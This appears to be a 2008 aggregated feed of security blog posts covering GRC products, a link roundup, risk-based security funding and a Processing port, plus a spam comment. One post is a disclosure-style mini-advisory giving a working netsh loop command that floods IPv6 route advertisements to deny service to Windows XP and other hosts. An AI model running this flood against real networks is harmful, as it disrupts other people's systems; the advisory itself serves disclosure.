One of the first things I covered over at Gartner was risk management, and I even started the internal risk research community. This was before SOX, and once that hit a few of us started adding in compliance coverage. Early on I started covering the predecessors to today’s GRC tools, and was even quoted in Fortune magazine saying there was almost no market for this stuff (some were predicting it would be billions). That, needless to say, pissed off a few vendors. Most of which are out of business or on life support.

Gunnar Peterson seems to feel the same. He sees GRC as letting your company become audit-driven, rather than business-driven. He is, needless to say, not betting his career on GRC.

Now I’m about to rant on GRC, but please don’t mistake this as criticism of governance, risk management, or compliance. All are important, and tightly related, but they are tools to achieve our business goals, not goals in and of themselves.

GRC however is a beast unto itself. GRC is now code for “selling stuff to the C-level”. It has little to do with real governance, risk, and compliance; and everything to do with selling under-performing products at inflated prices. When a vendor says “GRC” they are saying, “here’s our product to finally get us into the Board Room and the CEO’s office”. The problem is, there isn’t a market for GRC. Let’s look at the potential buyers:

  1. C-Level Executives (the CEO and CFO)
  2. Auditors (internal)
  3. Auditors (external)
  4. Business unit managers (including the CSO/security).

Before going any further let’s just knock off external auditors, since they aren’t about to spend on anything except their own internal tools, which GRC doesn’t target.

Now let’s talk about what GRC tools do. There is no consistent definition, but current tools evolved from the SOX compliance reporting tools that appeared when Sarbanes-Oxley hit. These tools evolved from a few places, but primarily a mix of risk documentation and document management. They then sprinkled in controls libraries licensed from the Final Four accounting firms. I was never enamored by these tools, since they did little more than help you document processes. That’s fine if you charge reasonable prices, but many of these things were overinflated, detached from operational realities unless you dedicated staff to them, and often just repurposed products which failed at their primary goal. Most of the tools now are focused on providing executives with a “dashboard” of risk and compliance. They can document controls, sometimes take live feeds from other applications, “soft-test” controls (e.g., send an email to someone to confirm they are doing what the tool thinks) and generate reports. Much of what we call GRC should really be features of your ERP and accounting software.

In the security world, most of what we call GRC tools are dashboard and reporting tools that survey or plug into the rest of our security architecture. Conceptually, this is fine, except we see the tools drifting away from being functional for those with operational responsibilities, and focusing more on genercising content for the “business” audience and auditors. It’s an additional, very highly priced, reporting layer.

That’s why I think this category is not only dead, it was never born. There is no one in an enterprise that will use a GRC tool on a day to day basis. The executives want their reports at the end of the quarter, and probably don’t mind a dashboard to glance at, but they’ll never drill down into all the minutiae of controls that probably aren’t what’s really being used in the first place. It’s not what they’re paid for. Internal auditors might also use reports and status checks, but they can almost always get this information from other sources. A GRC tool provides almost no value at the business unit level, since it doesn’t help them get their day to day jobs done.

The pretty dashboards and reports might be worth a certain investment, but not the six-figure plus fees most of them run for. No one really needs a GRC tool, since the tools don’t really perform productive work.

We’re seeing an onslaught of security (and other) vendors jumping on GRC because they think it will get them access to the CEO/CFO and bigger deals. But the CEO and CFO don’t give a rat’s ass how we do security, the just need to know if they are secure enough. That’s what they hire the CSO for- and it’s the CSO’s job to provide the right reports. These vendors would be better served by making great products and building in good reporting and management features to make the jobs of the security team easier.

Focus on helping security teams do their jobs and getting the auditors off their backs, rather than selling to a new audience that doesn’t care. Stop trying to sell to an audience (the CEO) that doesn’t care about you, when you have plenty of prospects out there drooling over those rare, good, functional products. Plenty of products get a boost from compliance, but they aren’t dedicated to it.

Don’t believe me? Go look at what people are really buying. Go ask your own CEO if he wants the latest GRC tool and will pay for it. Ask him if he wants to talk to any more vendors. Ask the operational guys if it will help them get their jobs done.

GRC is a feature, not a product. It’s a reporting tool, not a new paradigm for doing business.

As for the “practice” of GRC? I wouldn’t bet my career on a buzzword created by a small group of vendors to sell more product and jump on the bandwagon of yet another buzzword (compliance).

Compliance is real. Risk management is real. Governance and security are real. GRC is an unrequited wet dream leaving a rash of vendor blueballs in its wake.

Interesting Information Security bits for May 13th, 2008 [Infosec Ramblings]

Posted: 13 May 2008 01:40 PM CDT


Hi folks. Here are some things to take a look at.

Dave Whiteleggg has written a tutorial for Appscan.

Jeremiah points out three good reads on web application security.

Jeff Jones points us to a missive penned by Dr. Crispin Cowan about User Access Control and whether it is a convenience feature or a security feature. I won’t spoil to suprise. Go give it a gander.

Techdulla has post up about a new hire and there are some tidbits in there that are very good.

Jack has a list of some good Information Security based podcasts that you should check out.

There ya go. Have a great one.

Kevin

XP IPv6 DoS & IPv6 Networking Issues with W2K3 and Ubuntu (Also a DoS) [360 Security]

Posted: 13 May 2008 01:30 PM CDT

Back in May of 2007, I was doing some research into IPv6. I had a single host (Windows XP SP2) and a IPv6 Router (Server 2K3) and I was publishing addresses via the router. As I was publishing addresses, I started to notice that they were continually being added to the XP host; older addresses never replaced newer addresses and there seems to be no upper limit on the number of addresses.

I decided to investigate further and setup a simple loop to publish numerous routes. Interestingly enough every published route was received and recorded by the host. I only tested 7500 addresses but at the end of this I was seeing some interesting results, which I've detailed in the advisory below.

Given the results, I decided to contact the MSRC and report it. Since Microsoft's current stance on Denial of Service being a stability issue and not a vulnerability (I guess we've removed A from CIA), they weren't releasing a security advisory for this but instead mentioned that they'd include a fix in XP SP3. They also asked that I follow their responsible disclosure guidelines and not release details until they had patched it.

Given that XP SP3 is now floating around publically I wanted to blog to mention this issue, so I contacted the MSRC to ensure that the fix had been included. After about a week, the response I received was that due to an extensive bug list, they decided not to include this fix.

Since I had mentioned my desire to blog on this issue, they asked that I send them my blog post for review prior to posting it. Since that's done... I now present you with the mini-advisory that I wrote and shared internally almost 12 months ago. It's nothing amazing on a single XP host but it is obviously an issue.

--- Original Mini-Advisory (Sent to Microsoft) ---

Title:
Minor Denial of Service via IPv6 Address Publication


Background:
An IPv6 Router (in this case a 2k3 server) will publish an address for every route that it knows. There doesn't seem to be a limit on how many IPv6 Addresses can be published. If you continually add new routes, it will continually publish new routes. Every IPv6 device on the subnet will listen for these published addresses and add them to its interface.


What I did:
On my IPv6 Router I setup a simple For loop that would effectively add 9999 x 9999 routes to be published, each route would be advertised to the subnet.

Command:
C:\Documents and Settings\Administrator>for /L %k in (0, 1, 9999) DO for /L %i in (0, 1, 9999) DO netsh interface ipv6 add route 2001:db8:%k:%i::/64 "Local Area Connection" publish=yes


Results:
So far, I've added ~7500 addresses... CPU utilization on my XP machine receiving the addresses never drops from 100%. What's more interesting though is the output of the two commands below:

ipconfig

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
An internal error occurred: The file name is too long.
Please contact Microsoft Product Support Services for further help.
Additional information: Unable to query host name.

netsh interface ipv6 show address

C:\Documents and Settings\Administrator>netsh interface ipv6 show address
Querying active state...
No entries were found.
The file name is too long.


Caveats:
It appears that this only works if the XP hosts are on the network when you are publishing addresses at the time. If you add the addresses and then a new host comes online, it appears to only receive the last ~50 addresses. However if the machine is on the network as each address is published, it seems to obtain every address published and just keeps appending them.


May 2008 Updates:

I decided to check other operating systems to see how they responded. I went with Server 2003 and Ubuntu (and another XP test case). The results were interesting. It seems as though other operating systems have protections against this flood built in. Server 2003 limits itself to 9600 IPv6 Addresses, and Ubuntu limits itself to 16. Meanwhile, after 24 hours of testing (using the simple for loop described above (which has it's own drawbacks, including the requirement that it add each of these addresses to the IPv6 router -- a program designed specifically to flood these multicast packets out would be much more efficient)) I have published over 20K addresses and the XP host is trying it's hardest to pick them all up. ipconfig and netsh are unresponsive the majority of the time (every now and then it'll successfully print the addresses) and my CPU is constantly held at 100% by svchost.exe (running as SYSTEM).

This could be interesting with a large network of XP hosts and a script dedicated to publishing large quantities of IPv6 addresses. Especially since these are small multicast packets with minimal amounts of data contained within them.

While you can't flood the 2K3 and Ubuntu systems, something interesting does happen... when they hit their limit they seem to just ignore future published addresses. This could be a potentially bigger problem then simple CPU exhaustion. I will state first that this discussion could be entirely theoretical at this point, as I had a single test case but here's a thought for you. Ubuntu hits it's 16 address limit and Server 2003 hits it's 9600 address limit, what happens next time a valid address is published? Neither of these hosts updated their address lists as I published new ones, suggesting you could deny hosts from learning new addresses.

This begs the question, which is the bigger security risk? Flooding your client operating system and forcing 100% CPU utilization or ensuring your server environments can't learn new published addresses.

Appropriate funding [RiskAnalys.is]

Posted: 13 May 2008 07:24 AM CDT

Because many organizations are beginning to wrestle the funding beast at this time of year, I thought I’d focus this week’s post on the question of “appropriate funding”.  It only tangentially touches on the question of communicating about risk, but I’ll return to part two of that series next week.

One of the arguments I've heard folks use to dismiss the notion of a risk-based approach to security is that it's been tried and failed.  The argument goes on to claim that it isn't possible to get appropriate funding for security because management just doesn't "get it".  And, while I agree that many (most?) past attempts at risk-based security have struggled, I'd submit that it was because the methods used didn't address risk effectively.  They often focused solely on worst-case outcomes (which is the Chicken Little problem), didn't apply any rigor in determining risk, simply focused on vulnerability (but called it "risk"), or treated the problem as a possibility issue versus a probability issue. 

Of course, the argument about funding begs the question of what constitutes "appropriate funding".  It's naive (or arrogant) to believe that I — as an information security professional — am in a position to understand the incredible mix of business issues that determine the right risk-balance for an organization.  Running a business requires weighing the various risk-domains management faces (investment, insurance, product, market, security, etc.) as well as complex value propositions in light of the organization's objectives and limited resources.  And, while it's imperative that information security professionals seek to understand the business side of the equation, we are never going to have the same breadth and depth of vision into the organization's unique mix of business issues that executive management has.  Combine that with the fact that it isn't our risk tolerance that matters, and it should be crystal clear that complaints of being "underfunded" have to be cast in the light of "Compared to what?".  Compared to what we think it ought to be?  Compared to some industry baseline of questionable applicability to our organization?

Of course, I struggled to get management support for years.  I tried leveraging fear, uncertainty, and doubt.  I also tried the old "You have to do it because it's best practice" card.  And although both of these can work for awhile, at the end of the day, management's perspective will likely be that you're paranoid and you lack perspective about the nature of running a business.  I've come to the conclusion that if I believe I'm underfunded, then it's likely:

  • I haven't done a good job of communicating risk to the business, 
  • I don't sufficiently understand the risk tolerance of the organization's leadership, and/or
  • I don't understand the mix of competing risk issues, resource limitations, or business objectives.  

It's my responsibility to see that I'm not underfunded by providing high quality (unbiased) risk information to management.  If I do that, then I can expect to receive an appropriate level of funding given the other business considerations management faces and their risk tolerance.  The funding may be less than I'd like given my risk tolerance, but that's a personal problem. 

Frankly, since taking a risk-based approach to my job, I've had very little difficulty getting management support for the stuff that matters most.

Processing ported to Javascript. [NP-Incomplete]

Posted: 13 May 2008 01:01 AM CDT

The domain-specific visualization language Processing has been ported to Javascript. This is a "good thing". Thanks to Raffael Marty for the heads up. Also, this is my 100th post.

1 comment:

nasri said...

Hi

I read this post two times.

I like it so much, please try to keep posting.

Let me introduce other material that may be good for our community.

Source: Firefighter oral board interview questions

Best regards
Henry